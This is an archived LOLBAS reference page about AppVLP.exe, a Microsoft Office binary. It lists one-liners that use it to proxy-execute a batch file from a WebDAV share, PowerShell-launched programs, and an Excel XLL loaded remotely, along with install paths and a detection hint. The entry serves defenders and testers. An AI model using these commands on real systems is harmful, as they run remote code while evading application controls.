Skip to content
This repository has been archived by the owner on Dec 11, 2018. It is now read-only.

Latest commit

 

History

History
40 lines (27 loc) · 975 Bytes

Appvlp.md

File metadata and controls

40 lines (27 loc) · 975 Bytes

UPDATE BOOKMARKS - PROJECT MOVED TO A DEDICATED PROJECT SITE. THIS SITE WILL NOT BE UPDATED ANYMORE, BUT WILL BE KEPT FOR HISTORICAL REASONS.

New site: https://github.com/LOLBAS-Project/LOLBAS Web portal: https://lolbas-project.github.io/

Appvlp.exe

  • Functions: Execute
AppVLP.exe \\webdav\calc.bat   

AppVLP.exe powershell.exe -c "$e=New-Object -ComObject shell.application;$e.ShellExecute('calc.exe', '', '', 'open', 1)"    

AppVLP.exe powershell.exe -c "$e=New-Object -ComObject excel.application;$e.RegisterXLL('\\webdav\xll_poc.xll')" 

Acknowledgements:

  • fab - @0rbz_
  • Will - @moo_hax

Code sample: *

Resources:

Full path:

C:\Program Files\Microsoft Office\root\client\appvlp.exe       
C:\Program Files (x86)\Microsoft Office\root\client\appvlp.exe       

Notes: Requires Office.

Detection: Appvlp.exe spawning other process